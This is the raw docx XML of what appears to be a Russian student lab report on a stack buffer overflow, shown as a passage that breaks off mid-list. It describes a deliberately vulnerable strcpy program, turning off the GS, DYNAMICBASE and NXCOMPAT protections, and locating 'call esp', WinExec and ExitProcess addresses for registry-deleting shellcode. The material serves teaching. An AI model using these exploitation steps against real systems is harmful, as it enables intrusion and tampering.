    <w:p w14:paraId="45F568E9" w14:textId="551AB8AD" w:rsidR="00680322" w:rsidRDefault="003E32B5" w:rsidP="00610C6C">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t xml:space="preserve">азработать утилиту к </w:t>
      </w:r>
      <w:r w:rsidR="00610C6C" w:rsidRPr="00610C6C">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t>переполнению буфера</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C" w:rsidRPr="00610C6C">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7429EBF4" w14:textId="1435FE88" w:rsidR="00680322" w:rsidRPr="000E640D" w:rsidRDefault="00EB3B2A" w:rsidP="009D5664">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработать </w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t xml:space="preserve">шелл-код, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">удаляющий </w:t>
      </w:r>
      <w:r w:rsidR="00610C6C">
        <w:t>значение заданного ключа системного реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD28F7" w14:textId="7AFAF0FB" w:rsidR="000E640D" w:rsidRPr="009D5664" w:rsidRDefault="000E640D" w:rsidP="009D5664">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Проверить корректность программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C64DC" w14:textId="0F723245" w:rsidR="00C93DCC" w:rsidRDefault="003E32B5" w:rsidP="001F2E83">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc225271645"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ход работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="495275AB" w14:textId="28BB683C" w:rsidR="00C718F8" w:rsidRDefault="00C718F8" w:rsidP="00C718F8">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc225271646"/>
      <w:r>
        <w:t>Написание уязвимой программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0832A8EF" w14:textId="1FCACFA8" w:rsidR="00021818" w:rsidRPr="009D5664" w:rsidRDefault="00021818" w:rsidP="00021818">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">За основу была выбрана функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00021818">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">из заголовочного файла </w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t>&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8AA1DA" w14:textId="2A19A56C" w:rsidR="00021818" w:rsidRPr="0090221C" w:rsidRDefault="00021818" w:rsidP="00021818">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Инициализируется буфер типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">размером 6 байт, при помощи функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0028185D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0028185D" w:rsidRPr="0028185D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>пытаемся скопировать больше чем 6 байт, в следствии чего происходит ошибка</w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAD7A6" w14:textId="69208FBD" w:rsidR="00021818" w:rsidRDefault="00021818" w:rsidP="00021818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21372891" wp14:editId="696DB972">
            <wp:extent cx="6300470" cy="2546350"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6350"/>
            <wp:docPr id="67311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1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A50" w14:textId="0CED4F95" w:rsidR="00021818" w:rsidRDefault="00021818" w:rsidP="00021818">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>Переполнение буфера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0712C1BA" w14:textId="77777777" w:rsidR="00832B3B" w:rsidRPr="00832B3B" w:rsidRDefault="00832B3B" w:rsidP="00832B3B"/>
    <w:p w14:paraId="0DF6C967" w14:textId="3E408301" w:rsidR="00021818" w:rsidRPr="009D5664" w:rsidRDefault="00021818" w:rsidP="00021818">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Затем, </w:t>
      </w:r>
      <w:r w:rsidR="0028185D">
        <w:t xml:space="preserve">в проекте были </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">отключены </w:t>
      </w:r>
      <w:r w:rsidR="0028185D">
        <w:t xml:space="preserve">следующие </w:t>
      </w:r>
      <w:r>
        <w:t>защиты</w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D9BA0" w14:textId="4E302A28" w:rsidR="00021818" w:rsidRDefault="00021818" w:rsidP="006B6886">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита стека – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GS</w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">при включенном </w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, программа компилируется со специальным значением в стек функции, если же пользователь выход за пределы буфера, то он перезаписывает и само значение, после выхода из программы значение сверяется со стартовым, и если оно изменилось, то программа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>аварийно</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> завершается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751EF1E" w14:textId="7864FA45" w:rsidR="00021818" w:rsidRDefault="00021818" w:rsidP="006B6886">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Случайные адреса в памяти – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DYNAMICBASE</w:t>
      </w:r>
      <w:r w:rsidRPr="00021818">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">при включении этой функции, </w:t>
      </w:r>
      <w:r w:rsidR="00843C78">
        <w:t xml:space="preserve">все адреса будут располагаться в памяти случайным образом, каждый раз, когда программа будет запускаться, у модулей </w:t>
      </w:r>
      <w:r w:rsidR="00843C78" w:rsidRPr="00843C78">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00843C78">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00843C78" w:rsidRPr="00843C78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00843C78">
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00843C78">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00843C78" w:rsidRPr="00843C78">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00843C78">
        <w:t xml:space="preserve"> будет новый адрес.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4DD26E" w14:textId="71D98B54" w:rsidR="00843C78" w:rsidRDefault="00843C78" w:rsidP="006B6886">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Флаг безопасности </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C78">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NXCOMPAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00843C78">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при включении этой функции такие области памяти как</w:t>
      </w:r>
      <w:r w:rsidRPr="00843C78">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>стек, куча и</w:t>
      </w:r>
      <w:r w:rsidR="009D5664" w:rsidRPr="009D5664">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5664">
        <w:t>другие</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5664">
        <w:t>н</w:t>
      </w:r>
      <w:r>
        <w:t>ельзя исполнить как код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCE99E" w14:textId="3B167B7F" w:rsidR="00843C78" w:rsidRDefault="00544D55" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="afd"/>
      </w:pPr>
      <w:r w:rsidRPr="00544D55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="688C80B7" wp14:editId="5781E50D">
            <wp:extent cx="5722891" cy="3965418"/>
            <wp:effectExtent l="19050" t="19050" r="11430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282" cy="40072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B2F567" w14:textId="0713F79C" w:rsidR="00843C78" w:rsidRDefault="00843C78" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">– Отключение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240EC795" w14:textId="77777777" w:rsidR="00832B3B" w:rsidRPr="00832B3B" w:rsidRDefault="00832B3B" w:rsidP="00832B3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236F4EF0" w14:textId="0EF608D8" w:rsidR="00843C78" w:rsidRDefault="00544D55" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FBE0D81" wp14:editId="63A60F2C">
            <wp:extent cx="5793476" cy="3940171"/>
            <wp:effectExtent l="19050" t="19050" r="1714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642" cy="39525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F236F4" w14:textId="39963FFB" w:rsidR="00843C78" w:rsidRDefault="00843C78" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Отключение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DYNAMICBASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E64EB68" w14:textId="1F35BFE8" w:rsidR="00843C78" w:rsidRDefault="00544D55" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544D55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0FE039" wp14:editId="1CB53509">
            <wp:extent cx="5983599" cy="4055001"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="222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812" cy="40619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B0797B" w14:textId="184FFC2B" w:rsidR="00FD4F81" w:rsidRPr="00832B3B" w:rsidRDefault="00843C78" w:rsidP="00832B3B">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Отключение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NXCOMPAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD96B7" w14:textId="6172FEB6" w:rsidR="00544D55" w:rsidRDefault="00544D55" w:rsidP="00544D55">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546793CC" w14:textId="77777777" w:rsidR="00FD4F81" w:rsidRPr="00FD4F81" w:rsidRDefault="00FD4F81" w:rsidP="00FD4F81">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Адрес</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=7754739D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840A073" w14:textId="14333D59" w:rsidR="00FD4F81" w:rsidRDefault="00FD4F81" w:rsidP="004468C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Дизассемблированный</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CC54698" w14:textId="77777777" w:rsidR="00832B3B" w:rsidRPr="00544D55" w:rsidRDefault="00832B3B" w:rsidP="004468C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579FD658" w14:textId="253EFDC0" w:rsidR="00336EFE" w:rsidRDefault="00C94F45" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Шелл-код</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10801F23" w14:textId="61CB236C" w:rsidR="00843C78" w:rsidRDefault="00843C78" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Далее, при помощи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="0028185D">
        <w:t>64</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00843C78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">был получен дизассемблированный код </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>эксплоита</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582F7FB6" w14:textId="0D249B00" w:rsidR="00843C78" w:rsidRPr="009D5664" w:rsidRDefault="007A505E" w:rsidP="00843C78">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для начала необходимо найти инструкцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DD</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">это указатель на вершину стека, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>инструкция, которая кладет адрес следующей инструкции в стек и переходит по указанному адресу</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0C521" w14:textId="4D8A44B3" w:rsidR="007A505E" w:rsidRDefault="00FD4F81" w:rsidP="007A505E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7A67AF" wp14:editId="5A93F23B">
            <wp:extent cx="3299460" cy="1063160"/>
            <wp:effectExtent l="19050" t="19050" r="1524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4563" cy="1087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8880D4" w14:textId="4631DF4B" w:rsidR="007A505E" w:rsidRDefault="007A505E" w:rsidP="007A505E">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Адрес </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B865817" w14:textId="1727D97A" w:rsidR="007A505E" w:rsidRPr="003A19D9" w:rsidRDefault="007A505E" w:rsidP="003D2008">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Далее найден адрес </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A505E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для запуска команд</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>программ</w:t>
      </w:r>
      <w:r w:rsidRPr="007A505E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE0817" w14:textId="2EC07D0B" w:rsidR="00CC18C8" w:rsidRDefault="00FD4F81" w:rsidP="007A505E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2989C911" wp14:editId="25F36240">
            <wp:extent cx="4534533" cy="52394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DDFD" w14:textId="0DA1AA1F" w:rsidR="007A505E" w:rsidRDefault="007A505E" w:rsidP="007A505E">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">– Адрес </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BE94A53" w14:textId="2D6E0270" w:rsidR="0054010C" w:rsidRPr="00544D55" w:rsidRDefault="007A505E" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После всего был </w:t>
      </w:r>
      <w:r w:rsidR="0054010C">
        <w:t xml:space="preserve">найден адрес - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0054010C">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0054010C" w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0054010C">
        <w:t>для корректного завершения процесса</w:t>
      </w:r>
      <w:r w:rsidR="0054010C" w:rsidRPr="0054010C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B6CBE3" w14:textId="6344A82F" w:rsidR="00CC18C8" w:rsidRPr="00363C50" w:rsidRDefault="00FD4F81" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4F81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF5112D" wp14:editId="63A0E016">
            <wp:extent cx="4867954" cy="4286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5E26" w14:textId="7F0A6051" w:rsidR="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">– Адрес </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3361CD22" w14:textId="73E79A02" w:rsidR="0054010C" w:rsidRPr="0054010C" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все найдены байты были переведены в формат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>little</w:t>
      </w:r>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ending</w:t>
      </w:r>
      <w:r w:rsidRPr="0054010C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и записаны в шелл код</w:t>
      </w:r>
      <w:r w:rsidRPr="0054010C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1E2F6" w14:textId="77777777" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="0054010C" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054010C">
        <w:t>адреса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239CEAAF" w14:textId="1829BD2B" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="00363C50" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 77 54</w:t>
      </w:r>
      <w:r w:rsidR="0054010C" w:rsidRPr="009D5664">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 73 9D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E403F4" w14:textId="2A0A884A" w:rsidR="0054010C" w:rsidRPr="009D5664" w:rsidRDefault="00F6258E" w:rsidP="0054010C">
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
